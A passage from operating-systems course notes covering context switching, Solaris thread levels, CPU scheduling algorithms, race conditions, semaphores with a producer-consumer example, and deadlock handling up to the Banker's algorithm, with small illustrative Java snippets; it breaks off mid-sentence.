So even though two processes may be running the same piece of code, they need to have their own copy of the code in main memory to be able to run. Two processes also do not share other
resources with each other. This makes the creation of a new process very costly compared to that
of a new thread.
Context Switch
To give each process on a multi-programmed machine a fair share of the CPU, a hardware clock
generates interrupts periodically. This allows the operating system to schedule all processes in
main memory (using scheduling algorithm) to run on the CPU at equal intervals. Each time a
clock interrupt occurs, the interrupt handler checks how much time the current running process
has used. If it has used up its entire time slice, then the CPU scheduling algorithm (in kernel)
picks a different process to run. Each switch of the CPU from one process to another is called a
context switch.
Major Steps of Context Switching
- The values of the CPU registers are saved in the process table of the process that was running just before the clock interrupt occurred.
- The registers are loaded from the process picked by the CPU scheduler to run next.
In a multi-programmed uni-processor computing system, context switches occur frequently
enough that all processes appear to be running concurrently. If a process has more than one
thread, the Operating System can use the context switching technique to schedule the threads so
they appear to execute in parallel. This is the case if threads are implemented at the kernel level.
Threads can also be implemented entirely at the user level in run-time libraries. Since in this case
no thread scheduling is provided by the Operating System, it is the responsibility of the
programmer to yield the CPU frequently enough in each thread so all threads in the process can
make progress.
Action of Kernel to Context Switch Among Threads
The threads share a lot of resources with other peer threads belonging to the same process. So a
context switch among threads for the same process is easy. It involves switch of register set, the
program counter and the stack. It is relatively easy for the kernel to accomplish this task.
Action of kernel to Context Switch Among Processes
Context switches among processes are expensive. Before a process can be switched its process
control block (PCB) must be saved by the operating system. The PCB consists of the following
information:
- The process state.
- The program counter, PC.
- The values of the different registers.
- The CPU scheduling information for the process.
- Memory management information regarding the process.
- Possible accounting information for this process.
- I/O status information of the process.
When the PCB of the currently executing process has been saved, the operating system loads the PCB of the next process that is to run on the CPU. This is a heavy task and it takes a lot of time.
3.4 Implementation
The Solaris 2 operating system is a multithreaded operating environment with threads at the user level, intermediate level and kernel level. It also supports symmetric multiprocessing and real-time scheduling. The entire thread system in Solaris is depicted in the following figure.
Figure 3.2 Implementation of threads in Solaris 2
At user level
- The user-level threads are supported by a library for creation and scheduling, and the kernel knows nothing of these threads.
- These user-level threads are supported by lightweight processes (LWPs). Each LWP is connected to exactly one kernel-level thread, whereas a user-level thread is independent of the kernel.
- Many user-level threads may cooperate on one task. These threads may be scheduled and switched among LWPs without intervention of the kernel.
- User-level threads are extremely efficient because no kernel involvement is needed to block one thread and start another running.
Resource needs of user-level threads
- A user-level thread needs only a stack and a program counter; absolutely no kernel resources are required.
- Since the kernel is not involved in scheduling these user-level threads, switching among user-level threads is fast and efficient.
At intermediate level
The lightweight processes (LWPs) are located between the user-level threads and the kernel-level threads. These LWPs serve as "virtual CPUs" on which user-level threads can run. Each task contains at least one LWP. The user-level threads are multiplexed on the LWPs of the process.
Resource needs of LWPs
An LWP contains a process control block (PCB) with register data, accounting information and memory information. Therefore, switching between LWPs requires quite a bit of work, and LWPs are relatively slow compared to user-level threads.
At kernel level
The standard kernel-level threads execute all operations within the kernel. There is a kernel-level thread for each LWP, and there are some threads that run only on the kernel's behalf and have no associated LWP, for example a thread to service disk requests. By request, a kernel-level thread can be pinned to a processor (CPU); see the rightmost thread in the figure. The kernel-level threads are scheduled by the kernel's scheduler. In modern Solaris 2, a task no longer must block just because a kernel-level thread blocks; the processor (CPU) is free to run another thread.
Resource needs of kernel-level threads
A kernel thread has only a small data structure and a stack. Switching between kernel threads does not require changing memory-access information, and therefore kernel-level threads are relatively fast and efficient.
3.5 Exercises
1. Palm OS provides no means of concurrent processing. Discuss three major complications
that concurrent processing adds to an operating system.
Answer:
(a) A method of time sharing must be implemented to allow each of several processes to
have access to the system. This method involves the preemption of processes that do not
voluntarily give up the CPU and the kernel being reentrant.
(b) Processes and system resources must have protections and must be protected from each
other. Any given process must be limited in the amount of memory it can use and the
operations it can perform on devices like disks.
(c) Care must be taken in the kernel to prevent deadlocks between processes, so processes
aren’t waiting for each other’s allocated resources.
2. When a process in the Linux OS creates a new process using the fork() operation, which of the following are shared between the parent process and the child process: the stack, the heap, or shared memory segments?
Answer:
Only the shared memory segments are shared between the parent process and the newly
forked child process. Copies of the stack and the heap are made for the newly created
process.
3. The Sun UltraSPARC processor has multiple register sets. Describe the actions of a context
switch if the new context is already loaded into one of the register sets. What else must
happen if the new context is in memory rather than in a register set and all the register sets
are in use?
Answer:
The CPU current-register-set pointer is changed to point to the set containing the new
context, which takes very little time. If the context is in memory, one of the contexts in a
register set must be chosen and be moved to memory, and the new context must be loaded
from memory into the set. This process takes a little more time than on systems with one set
of registers, depending on how a replacement victim is selected.
4. Provide two programming examples in which multithreading provides better performance
than a single-threaded solution.
Answer:
(a) A Web server that services each request in a separate thread.
(b) A parallelized application such as matrix multiplication where different parts of the
matrix may be worked on in parallel.
5. What are the two differences between user-level threads and kernel-level threads? Under
what circumstances is one type better than the other?
Answer:
(a) User-level threads are unknown by the kernel, whereas the kernel is aware of kernel
threads.
(b) On systems using either M:1 or M:N mapping, user threads are scheduled by the thread
library and the kernel schedules kernel threads.
(c) Kernel threads need not be associated with a process whereas every user thread belongs
to a process. Kernel threads are generally more expensive to maintain than user threads as
they must be represented with a kernel data structure.
4. Process Management
4.1 CPU/Process Scheduling
The assignment of physical processors to processes allows processors to accomplish work. The problem of determining when processors should be assigned, and to which processes, is called processor scheduling or CPU scheduling.
When more than one process is runnable, the operating system must decide which one to run first. The part of the operating system concerned with this decision is called the scheduler, and the algorithm it uses is called the scheduling algorithm.
Goals of scheduling (objectives). Many objectives must be considered in the design of a scheduling discipline. In particular, a scheduler should consider fairness, efficiency, response time, turnaround time, throughput, etc. Some of these goals depend on the system one is using, for example a batch system, an interactive system or a real-time system, but there are also goals that are desirable in all systems. These goals are described below.
- Fairness. Fairness is important under all circumstances. A scheduler makes sure that each process gets its fair share of the CPU and no process suffers indefinite postponement. Note that giving equivalent or equal time is not necessarily fair; think of safety control and payroll at a nuclear plant.
- Policy enforcement. The scheduler has to make sure that the system's policy is enforced. For example, if the local policy is safety, then the safety-control processes must be able to run whenever they want to, even if it means a delay in the payroll processes.
- Efficiency. The scheduler should keep the system (or in particular the CPU) busy one hundred percent of the time when possible. If the CPU and all the input/output devices can be kept running all the time, more work gets done per second than if some components are idle.
- Response time. A scheduler should minimize the response time for interactive users.
- Turnaround. A scheduler should minimize the time batch users must wait for output.
- Throughput. A scheduler should maximize the number of jobs processed per unit time.
A little thought will show that some of these goals are contradictory. It can be shown that any scheduling algorithm that favors some class of jobs hurts another class of jobs. The amount of CPU time available is finite, after all.
Preemptive Vs Non-preemptive Scheduling
The Scheduling algorithms can be divided into two categories with respect to how they deal with
clock interrupts.
Non-preemptive Scheduling. A scheduling discipline is non-preemptive if, once a process has
been given the CPU, the CPU cannot be taken away from that process.
Following are some characteristics of non-preemptive scheduling:
 In a non-preemptive system, short jobs are made to wait by longer jobs, but the overall
treatment of all processes is fair.
 In a non-preemptive system, response times are more predictable because incoming high
priority jobs cannot displace waiting jobs.
 In non-preemptive scheduling, the scheduler dispatches a job when a process switches from
the running state to the waiting state, or when a process terminates.
Preemptive Scheduling. A scheduling discipline is preemptive if the CPU can be taken away from
a process to which it has been given. The strategy of allowing processes that are logically runnable
to be temporarily suspended is called preemptive scheduling, and it is in contrast to the "run to
completion" method.
Scheduling Algorithms
There are many process scheduling algorithms. Some of them are described below.
 First-Come-First-Served (FCFS) Scheduling. Other names of this algorithm are First-In-First-Out
(FIFO), Run-to-Completion, and Run-Until-Done. First-Come-First-Served is perhaps the
simplest scheduling algorithm. Processes are dispatched according to their
arrival time on the ready queue. Being a non-preemptive discipline, once a process has the
CPU, it runs to completion. FCFS scheduling is fair in the formal or human sense
of fairness, but it is unfair in the sense that long jobs make short jobs wait and unimportant
jobs make important jobs wait. FCFS is more predictable than most other schemes since the
order of service is known in advance. The FCFS scheme is not useful in scheduling interactive users
because it cannot guarantee good response time. The code for FCFS scheduling is simple to write and
understand. One of the major drawbacks of this scheme is that the average waiting time is often quite
long.
The First-Come-First-Served algorithm is rarely used as a master scheme in modern
operating systems but it is often embedded within other schemes.
 Round Robin (RR) Scheduling. One of the oldest, simplest, fairest and most widely used
algorithms is round robin (RR). In round robin scheduling, processes are dispatched in a FIFO
manner but are given a limited amount of CPU time called a time-slice or a quantum.
If a process does not complete before its CPU-time expires, the CPU is preempted and given
to the next process waiting in a queue. The preempted process is then placed at the back of
the ready list.
Round Robin Scheduling is preemptive (at the end of time-slice) therefore it is effective in
time-sharing environments in which the system needs to guarantee reasonable response times
for interactive users.
The only interesting issue with the round robin scheme is the length of the quantum. Setting the
quantum too short causes too many context switches and lowers the CPU efficiency. On the
other hand, setting the quantum too long may cause poor response time and approximates
FCFS. In any event, the average waiting time under round robin scheduling is often quite
long. (A small round-robin simulation sketch is given at the end of this list of algorithms.)
 Shortest-Job-First (SJF) Scheduling. Another name for this algorithm is Shortest-Process-Next
(SPN). Shortest-Job-First (SJF) is a non-preemptive discipline in which the waiting job (or
process) with the smallest estimated run-time-to-completion is run next. In other words,
when the CPU is available, it is assigned to the process that has the smallest next CPU burst.
SJF scheduling is especially appropriate for batch jobs for which the run times are known in
advance. Since the SJF scheduling algorithm gives the minimum average waiting time for a given set of
processes, it is provably optimal.
The SJF algorithm favors short jobs (or processes) at the expense of longer ones. The obvious
problem with the SJF scheme is that it requires precise knowledge of how long a job or process will
run, and this information is not usually available. The best the SJF algorithm can do is to rely on user
estimates of run times.
In the production environment where the same jobs run regularly, it may be possible to provide
reasonable estimate of run time, based on the past performance of the process. But in the
development environment users rarely know how their program will execute.
Like FCFS, SJF is non-preemptive; therefore, it is not useful in a timesharing environment in which
reasonable response time must be guaranteed.
 Shortest-Remaining-Time (SRT) Scheduling. SRT is the preemptive counterpart of
SJF and is useful in time-sharing environments.
In SRT scheduling, the process with the smallest estimated run-time to completion is run next,
including new arrivals. In the SJF scheme, once a job begins executing, it runs to completion. In the
SRT scheme, a running process may be preempted by a newly arriving process with a shorter
estimated run-time.
The SRT algorithm has higher overhead than its counterpart SJF. SRT must keep track of
the elapsed time of the running process and must handle occasional preemptions.
In this scheme, newly arriving small processes will run almost immediately. However, longer jobs
have an even longer mean waiting time.
 Priority Scheduling. The basic idea is straightforward: each process is assigned a priority,
and the runnable process with the highest priority is allowed to run. Equal-priority processes are
scheduled in FCFS order. The Shortest-Job-First (SJF) algorithm is a special case of the general
priority scheduling algorithm. An SJF algorithm is simply a priority algorithm where the priority
is the inverse of the (predicted) next CPU burst. That is, the longer the CPU burst, the lower the
priority, and vice versa.
Priority can be defined either internally or externally. Internally defined priorities use some
measurable quantity or quality to compute the priority of a process.
Examples of internal priorities are time limits, memory requirements, file requirements (for
example, the number of open files), and CPU versus I/O requirements.
Externally defined priorities are set by criteria that are external to the operating system, such as the
importance of the process, the type or amount of funds being paid for computer use, the department
sponsoring the work, and politics.
Priority scheduling can be either preemptive or non-preemptive. A preemptive priority algorithm
will preempt the CPU if the priority of the newly arrived process is higher than the priority of
the currently running process.
A non-preemptive priority algorithm will simply put the new process at the head of the ready
queue. A major problem with priority scheduling is indefinite blocking or starvation. A solution
to the problem of indefinite blockage of the low-priority process is aging. Aging is a technique
of gradually increasing the priority of processes that wait in the system for a long period of time.
 Multilevel Queue Scheduling. A multilevel queue scheduling algorithm partitions the ready
queue into several separate queues. Processes are permanently assigned to one queue,
based on some property of the process, such as memory size, process priority or process
type.
The algorithm chooses the process from the occupied queue that has the highest priority, and runs
that process either preemptively or non-preemptively. Each queue has its own scheduling algorithm
or policy.
Possibility I. If each queue has absolute priority over lower-priority queues, then no process in a
lower-priority queue can run unless the higher-priority queues are all empty. For example,
no process in the batch queue could run unless the queues for system
processes, interactive processes, and interactive editing processes were all empty.
Possibility II. If there is a time slice between the queues, then each queue gets a certain amount of
CPU time, which it can then schedule among the processes in its queue. For instance, 80% of
the CPU time might go to the foreground queue using RR and 20% of the CPU time to the
background queue using FCFS.
Since processes do not move between queues, this policy has the advantage of low scheduling
overhead, but it is inflexible.
 Multilevel Feedback Queue Scheduling. The multilevel feedback queue scheduling algorithm
allows a process to move between queues. It uses many ready queues and associates a
different priority with each queue.
The algorithm chooses the process with the highest priority from the occupied queues and runs that
process either preemptively or non-preemptively. If the process uses too much CPU time, it will be
moved to a lower-priority queue. Similarly, a process that waits too long in a lower-priority
queue may be moved to a higher-priority queue. Note
that this form of aging prevents starvation.
For example, a process entering the ready queue is placed in queue 0. If it does not finish within
an 8-millisecond quantum, it is moved to the tail of queue 1. If it does not complete there, it is
preempted and placed in queue 2. Processes in queue 2 run on an FCFS basis, but only when
queue 0 and queue 1 are empty.
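The time-slice behavior of round robin, referred to above, can be illustrated with a short
simulation. The sketch below is illustrative only: the process names, burst times and quantum are
made up, and the code is not taken from any particular operating system.

import java.util.ArrayDeque;
import java.util.Queue;

// A small round-robin simulation sketch: run each ready process for at most one
// quantum, then move it to the back of the ready list if it is not finished.
public class RoundRobinDemo {
    public static void main(String[] args) {
        String[] names = {"P1", "P2", "P3"};
        int[] remaining = {8, 4, 1};          // remaining CPU time of each process
        int quantum = 2;                      // time-slice length

        Queue<Integer> ready = new ArrayDeque<>();
        for (int i = 0; i < names.length; i++) ready.add(i);

        int time = 0;
        while (!ready.isEmpty()) {
            int p = ready.remove();
            int run = Math.min(quantum, remaining[p]);
            time += run;
            remaining[p] -= run;
            if (remaining[p] > 0) {
                ready.add(p);                 // preempted: back of the ready list
            } else {
                System.out.println(names[p] + " finishes at time " + time);
            }
        }
    }
}

With a quantum of 2, P3 finishes at time 5, P2 at time 9 and P1 at time 13; a shorter quantum
would interleave the processes more finely at the cost of more context switches.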
4.2 Interprocess Communication
Since processes frequently need to communicate with other processes, there is a need
for well-structured communication among processes that does not rely on interrupts.
Race Conditions
In operating systems, processes that are working together share some common storage (main
memory, files, etc.) that each process can read and write. Situations in which two or more processes
are reading or writing some shared data and the final result depends on who runs precisely when are
called race conditions. Concurrently executing threads that share data need to synchronize their
operations and processing in order to avoid race conditions on shared data. Only one
thread at a time should be allowed to examine and update a shared variable.
Race conditions are also possible in Operating Systems. If the ready queue is implemented as a
linked list and if the ready queue is being manipulated during the handling of an interrupt, then
interrupts must be disabled to prevent another interrupt from occurring before the first one completes. If
interrupts are not disabled, then the linked list could become corrupted.
Critical Section
Figure 4.1 Critical section
The key to preventing trouble involving shared storage is to find some way to prohibit more than
one process from reading and writing the shared data simultaneously. That part of the program
where the shared memory is accessed is called the critical section. To avoid race conditions and
flawed results, one must identify the code that forms a critical section in each thread. The characteristic
properties of the code that forms a critical section are:
 Code that references one or more variables in a “read-update-write” fashion while any of
those variables is possibly being altered by another thread.
 Code that alters one or more variables that are possibly being referenced in a “read-update-write”
fashion by another thread.
 Code that uses a data structure while any part of it is possibly being altered by another thread.
 Code that alters any part of a data structure while it is possibly in use by another thread.
Here, the important point is that when one process is executing shared modifiable data in its
critical section, no other process is to be allowed to execute in its critical section. Thus, the
execution of critical sections by the processes is mutually exclusive in time.
Mutual Exclusion
A way of making sure that if one process is using a shared modifiable data, the other processes
will be excluded from doing the same thing.
Formally, while one process is executing the shared variable, all other processes desiring to do so at
the same moment should be kept waiting; when that process has finished executing the
shared variable, one of the processes waiting to do so should be allowed to proceed. In this
fashion, each process executing the shared data (variables) excludes all others from doing so
simultaneously. This is called mutual exclusion.
Note that mutual exclusion needs to be enforced only when processes access shared modifiable
data - when processes are performing operations that do not conflict with one another they
should be allowed to proceed concurrently.
Mutual Exclusion Conditions
If we could arrange matters such that no two processes were ever in their critical sections
simultaneously, we could avoid race conditions. We need four conditions to hold to have a good
solution for the critical section problem (mutual exclusion).
 No two processes may be inside their critical sections at the same moment.
 No assumptions are made about relative speeds of processes or the number of CPUs.
 No process outside its critical section should block other processes.
 No process should have to wait arbitrarily long to enter its critical section.
4.3 Process Synchronization
The mutual exclusion problem is to devise a pre-protocol (or entry protocol) and a post-protocol
(or exit protocol) to keep two or more threads from being in their critical sections at the same
time. Tanenbaum examines several proposals for the critical-section (mutual exclusion) problem.
Problem. When one process is updating shared modifiable data in its critical section, no other
process should be allowed to enter its critical section.
Proposal 1 -Disabling Interrupts (Hardware Solution)
Each process disables all interrupts just after entering its critical section and re-enables all
interrupts just before leaving the critical section. With interrupts turned off, the CPU cannot be
switched to another process. Hence, no other process will enter its critical section, and mutual
exclusion is achieved.
Disabling interrupts is sometimes a useful technique within the
kernel of an operating system, but it is not appropriate as a general mutual exclusion mechanism
for user processes. The reason is that it is unwise to give user processes the power to turn off
interrupts.
Proposal 2 - Lock Variable (Software Solution)
In this solution, we consider a single, shared (lock) variable, initially 0. When a process wants to
enter its critical section, it first tests the lock. If the lock is 0, the process sets it to 1 and then
enters the critical section. If the lock is already 1, the process just waits until the (lock) variable
becomes 0. Thus, a 0 means that no process is in its critical section, and a 1 means hold your
horses - some process is in its critical section.
The flaw in this proposal can be best explained by example. Suppose process A sees that the lock
is 0. Before it can set the lock to 1 another process B is scheduled, runs, and sets the lock to 1.
When the process A runs again, it will also set the lock to 1, and two processes will be in their
critical section simultaneously.
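The flaw above disappears if testing and setting the lock happen as one indivisible step. As a
sketch (not one of the classical proposals discussed in this text), Java's
AtomicBoolean.compareAndSet provides such an atomic test-and-set; the class name SpinLock is
illustrative.

import java.util.concurrent.atomic.AtomicBoolean;

// Sketch: the lock-variable idea made safe by an atomic test-and-set.
// compareAndSet(false, true) checks and sets the lock in one indivisible step,
// so two processes can no longer both see 0 and both enter the critical section.
public class SpinLock {
    private final AtomicBoolean locked = new AtomicBoolean(false);

    public void enterCriticalSection() {
        while (!locked.compareAndSet(false, true)) {
            // busy-wait (spin) until the lock becomes free
        }
    }

    public void leaveCriticalSection() {
        locked.set(false);
    }
}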
Proposal 3 - Strict Alternation
In this proposed solution, the integer variable 'turn' keeps track of whose turn it is to enter the
critical section. Initially, process 0 inspects turn, finds it to be 0, and enters its critical section.
Process 1 also finds it to be 0 and sits in a loop continually testing 'turn' to see when it becomes
1. Continuously testing a variable while waiting for some value to appear is called busy-waiting.
Taking turns is not a good idea when one of the processes is much slower than the other.
Suppose process 0 finishes its critical section quickly, so both processes are now in their
noncritical sections. This situation violates condition 3 mentioned above.
Using System calls 'sleep' and 'wakeup'
Basically, what the above-mentioned solutions do is this: when a process wants to enter its
critical section, it checks to see if entry is allowed. If it is not, the process goes into a tight loop
and waits (i.e., starts busy waiting) until it is allowed to enter. This approach wastes CPU time.
Now we look at an interprocess communication primitive: the pair of system calls sleep and wakeup.
 Sleep. It is a system call that causes the caller to block, that is, be suspended until some
other process wakes it up.
 Wakeup. It is a system call that wakes up the process.
Both 'sleep' and 'wakeup' system calls have one parameter that represents a memory address used
to match up 'sleeps' and 'wakeups'.
The Bounded Buffer Producers and Consumers
The bounded-buffer producers and consumers assume that there is a fixed buffer size, i.e., a finite
number of slots is available.
Statement. To suspend the producers when the buffer is full, to suspend the consumers when the
buffer is empty, and to make sure that only one process at a time manipulates a buffer so there
are no race conditions or lost updates.
As an example of how sleep-wakeup system calls are used, consider the producer-consumer
problem, also known as the bounded buffer problem.
Two processes share a common, fixed-size (bounded) buffer. The producer puts information into
the buffer and the consumer takes information out.
Trouble arises when
 The producer wants to put new data in the buffer, but the buffer is already full.
Solution: the producer goes to sleep, to be awakened when the consumer has removed
data.
 The consumer wants to remove data from the buffer, but the buffer is already empty.
Solution: the consumer goes to sleep until the producer puts some data in the buffer and wakes
the consumer up.
This approach also leads to the same race conditions we have seen in earlier approaches. A race
condition can occur because access to the shared count of items in the buffer is unconstrained. The
essence of the problem is that a wakeup call sent to a process that is not (yet) sleeping is lost.
Semaphores
E.W. Dijkstra (1965) abstracted the key notion of mutual exclusion in his concepts of
semaphores.
A semaphore is a protected variable whose value can be accessed and altered only by the
operations P and V and an initialization operation ('semaphore initialize').
Binary semaphores can assume only the value 0 or the value 1; counting semaphores (also called
general semaphores) can assume any nonnegative value.
The P (or wait or sleep or down) operation on semaphores S, written as P(S) or wait (S), operates
as follows:
P(S): IF S > 0
THEN S := S – 1
ELSE (wait on S)
The V (or signal or wakeup or up) operation on semaphore S, written as V(S) or signal (S),
operates as follows:
V(S): IF (one or more process are waiting on S)
THEN (let one of these processes proceed)
ELSE S := S +1
Operations P and V are done as single, indivisible, atomic actions. It is guaranteed that once a
semaphore operation has started, no other process can access the semaphore until the operation has
completed. Mutual exclusion on the semaphore, S, is enforced within P(S) and V(S).
If several processes attempt a P(S) simultaneously, only one process will be allowed to proceed.
The other processes will be kept waiting, but the implementation of P and V guarantees that
processes will not suffer indefinite postponement. Semaphores solve the lost-wakeup problem.
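In a modern thread library, P and V correspond to acquire and release operations on a counting
semaphore. The following sketch shows the idea using java.util.concurrent.Semaphore; it is one
possible realization of the definitions above, and the class and method names other than the
Semaphore API itself are illustrative.

import java.util.concurrent.Semaphore;

// Sketch: P(S) and V(S) expressed with java.util.concurrent.Semaphore.
public class MutexDemo {
    static final Semaphore S = new Semaphore(1);   // binary semaphore, initially 1

    static void criticalSection(String who) throws InterruptedException {
        S.acquire();                               // P(S): wait / down
        try {
            System.out.println(who + " is in its critical section");
        } finally {
            S.release();                           // V(S): signal / up
        }
    }

    public static void main(String[] args) throws InterruptedException {
        Thread a = new Thread(() -> { try { criticalSection("A"); } catch (InterruptedException e) { } });
        Thread b = new Thread(() -> { try { criticalSection("B"); } catch (InterruptedException e) { } });
        a.start(); b.start();
        a.join(); b.join();
    }
}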
Producer-Consumer Problem Using Semaphores
The solution to the producer-consumer problem uses three semaphores, namely full, empty and
mutex.
The semaphore 'full' is used for counting the number of slots in the buffer that are full. The
'empty' for counting the number of slots that are empty and semaphore 'mutex' to make sure that
the producer and consumer do not access modifiable shared section of the buffer simultaneously.
Initialization
Set full buffer slots to 0, i.e., semaphore full = 0.
Set empty buffer slots to N, i.e., semaphore empty = N.
To control access to the critical section, set mutex to 1, i.e., semaphore mutex = 1.
Producer ( )
  WHILE (true)
    produce-Item ( );
    P (empty);
    P (mutex);
    enter-Item ( );
    V (mutex);
    V (full);
Consumer ( )
  WHILE (true)
    P (full);
    P (mutex);
    remove-Item ( );
    V (mutex);
    V (empty);
    consume-Item (Item);
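A runnable sketch of the same solution is given below, using java.util.concurrent.Semaphore. The
buffer size N, the item values and the class name are illustrative assumptions; the semaphore
discipline (P on empty/full, mutex around the buffer) follows the pseudocode above.

import java.util.concurrent.Semaphore;

// A minimal bounded-buffer sketch with one producer and one consumer.
public class BoundedBuffer {
    static final int N = 5;
    static final int[] buffer = new int[N];
    static int in = 0, out = 0;

    static final Semaphore empty = new Semaphore(N); // counts empty slots
    static final Semaphore full = new Semaphore(0);  // counts full slots
    static final Semaphore mutex = new Semaphore(1); // protects the buffer

    public static void main(String[] args) {
        Thread producer = new Thread(() -> {
            for (int item = 0; item < 20; item++) {
                try {
                    empty.acquire();          // P(empty)
                    mutex.acquire();          // P(mutex)
                    buffer[in] = item;        // enter-Item
                    in = (in + 1) % N;
                    mutex.release();          // V(mutex)
                    full.release();           // V(full)
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                    return;
                }
            }
        });

        Thread consumer = new Thread(() -> {
            for (int i = 0; i < 20; i++) {
                try {
                    full.acquire();           // P(full)
                    mutex.acquire();          // P(mutex)
                    int item = buffer[out];   // remove-Item
                    out = (out + 1) % N;
                    mutex.release();          // V(mutex)
                    empty.release();          // V(empty)
                    System.out.println("consumed " + item);  // consume-Item
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                    return;
                }
            }
        });

        producer.start();
        consumer.start();
    }
}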
4.4 Deadlock
A set of processes is in a deadlock state if each process in the set is waiting for an event that can be
caused only by another process in the set. In other words, each member of the set of deadlocked
processes is waiting for a resource that can be released only by another deadlocked process. None of
the processes can run, none of them can release any resources, and none of them can be awakened. It
is important to note that the number of processes and the number and kind of resources possessed
and requested are unimportant.
The resources may be either physical or logical. Examples of physical resources are printers,
tape drives, memory space, and CPU cycles. Examples of logical resources are files,
semaphores, and monitors.
The simplest example of deadlock is where process 1 has been allocated non-shareable resource
A, say, a tape drive, and process 2 has been allocated non-sharable resource B, say, a printer. Now, if
it turns out that process 1 needs resource B (the printer) to proceed and process 2 needs resource A
(the tape drive) to proceed, and these are the only two processes in the system, each is blocked by
the other and all useful work in the system stops. This situation is termed deadlock. The system
is in a deadlock state because each process holds a resource being requested by the other process,
and neither process is willing to release the resource it holds.
Preemptable and Non-preemptable Resources.
Resources come in two flavors: preemptable and non-preemptable. A preemptable resource is
one that can be taken away from the process with no ill effects. Memory is an example of a
preemptable resource. On the other hand, a non-preemptable resource is one that cannot be taken
away from a process without causing ill effects. A CD recorder, for example, is not preemptable
at an arbitrary moment.
Reallocating resources can resolve deadlocks that involve preemptable resources. Deadlocks that
involve non-preemptable resources are difficult to deal with.
Dealing with Deadlock Problem
In general, there are four strategies for dealing with the deadlock problem:
 The Ostrich Approach. Just ignore the deadlock problem altogether.
 Deadlock Detection and Recovery. Detect deadlock and, when it occurs, take steps to
recover.
 Deadlock Avoidance. Avoid deadlock by careful resource scheduling.
 Deadlock Prevention. Prevent deadlock by resource scheduling so as to negate at least
one of the four necessary conditions.
Deadlock Prevention
Havender in his pioneering work showed that since all four of the conditions are necessary for
deadlock to occur, it follows that deadlock might be prevented by denying any one of the
conditions.
 Elimination of “Mutual Exclusion” Condition. The mutual exclusion condition must hold
for non-sharable resources. That is, several processes cannot simultaneously share a
single resource. This condition is difficult to eliminate because some resources, such as
the tape drive and printer, are inherently non-shareable. Note that shareable resources like
a read-only file do not require mutually exclusive access and thus cannot be involved in
deadlock.
 Elimination of “Hold and Wait” Condition. There are two possibilities for elimination of
the second condition. The first alternative is that a process be granted all of the
resources it needs at once, prior to execution. The second alternative is to disallow a
process from requesting resources whenever it has previously allocated resources. This
strategy requires that all of the resources a process will need must be requested at once.
The system must grant resources on an “all or none” basis. If the complete set of resources
needed by a process is not currently available, then the process must wait until the
complete set is available. While the process waits, however, it may not hold any
resources. Thus the “wait for” condition is denied and deadlocks simply cannot occur.
This strategy can lead to serious waste of resources. For example, a program requiring ten
tape drives must request and receive all ten drives before it begins executing. If the
program needs only one tape drive to begin execution and does not need the
remaining tape drives for several hours, then substantial computer resources (nine tape
drives) will sit idle for several hours. This strategy can also cause indefinite postponement
(starvation), since not all the required resources may become available at once.
 Elimination of “No-preemption” Condition. The no-preemption condition can be
alleviated by forcing a process waiting for a resource that cannot immediately be
allocated to relinquish all of its currently held resources, so that other processes may use
them to finish. Suppose a system does allow processes to hold resources while requesting
additional resources. Consider what happens when a request cannot be satisfied. A
process holds resources a second process may need in order to proceed, while the second
process may hold the resources needed by the first process. This is a deadlock. This
strategy requires that when a process that is holding some resources is denied a request
for additional resources, the process must release its held resources and, if necessary,
request them again together with the additional resources. Implementation of this strategy
effectively denies the “no-preemption” condition.
When a process releases its resources, it may lose all its work to that point. One
serious consequence of this strategy is the possibility of indefinite postponement
(starvation): a process might be held off indefinitely as it repeatedly requests and
releases the same resources.
 Elimination of “Circular Wait” Condition. The last condition, the circular wait, can be
denied by imposing a total ordering on all of the resource types and then forcing all
processes to request the resources in order (increasing or decreasing). This strategy
imposes a total ordering of all resource types, and requires that each process requests
resources in numerical order (increasing or decreasing) of enumeration. With this rule,
the resource allocation graph can never have a cycle.
Now the rule is this: processes can request resources whenever they want to, but all
requests must be made in numerical order. A process may request first a printer and then a
tape drive (order: 2, 4), but it may not request first a plotter and then a printer (order: 3,
2). The problem with this strategy is that it may be impossible to find an ordering that
satisfies everyone.
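As a small sketch of the resource-ordering rule, the fragment below always acquires the
lower-numbered resource first, so a circular wait between the two threads cannot arise. The
resource objects and their numbering are illustrative.

// Sketch: imposing a total order on resources (circular-wait elimination).
// Both threads always lock `printer` (order 2) before `tapeDrive` (order 4).
public class LockOrdering {
    static final Object printer = new Object();    // resource number 2
    static final Object tapeDrive = new Object();  // resource number 4

    static void job(String name) {
        synchronized (printer) {          // always request the lower-numbered resource first
            synchronized (tapeDrive) {
                System.out.println(name + " holds both resources");
            }
        }
    }

    public static void main(String[] args) {
        new Thread(() -> job("process 1")).start();
        new Thread(() -> job("process 2")).start();
    }
}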
Deadlock Avoidance
This approach to the deadlock problem anticipates deadlock before it actually occurs. This
approach employs an algorithm to assess the possibility that deadlock could occur and acts
accordingly. This method differs from deadlock prevention, which guarantees that deadlock
cannot occur by denying one of the necessary conditions of deadlock.
If the necessary conditions for a deadlock are in place, it is still possible to avoid deadlock by
being careful when resources are allocated. Perhaps the most famous deadlock avoidance
algorithm, due to Dijkstra [1965], is the Banker’s algorithm.
Banker’s Algorithm
The Banker's algorithm is usually explained with a banking analogy: customers are equivalent to
processes, units of credit are equivalent to resources like disk space, and the banker is equivalent
to the operating system.
Customer   Used   Max
A          0      6
B          0      5
C          0      4
D          0      7
Available Units: 10
Table 4.1 Initial state of Banker’s algorithm
In Table 4.1, we see four customers, each of whom has been granted a maximum number of credit
units. The banker has reserved only 10 units rather than 22 units to service them. At a certain
moment, the situation becomes the one shown in Table 4.2.
Customer   Used   Max
A          1      6
B          1      5
C          2      4
D          4      7
Available Units: 2
Table 4.2 Safe state of Banker’s algorithm
Safe state. The key to a state being safe is that there is at least one way for all customers to finish. In
the banker analogy, the state of Table 4.2 is safe because, with 2 units left, the banker can delay
any request except C's, thus letting C finish and release all four of its units. With four units in
hand, the banker can let either D or B have the necessary units, and so on.
Unsafe state. Consider what would happen if a request from B for one more unit were granted in
the state of Table 4.2; we would then have the situation shown in Table 4.3, which is an unsafe state.
If all the customers, namely A, B, C, and D, asked for their maximum loans, then the banker could
not satisfy any of them, and we would have a deadlock.
Customer   Used   Max
A          1      6
B          2      5
C          2      4
D          4      7
Available Units: 1
Table 4.3 Deadlock in Banker’s algorithm
Important Note. It is important to note that an unsafe state does not imply the existence, or even
the eventual existence, of a deadlock. What an unsafe state does imply is simply that some
unfortunate sequence of events might lead to a deadlock.
The Banker's algorithm is thus to consider each request as it occurs and see if granting it leads to
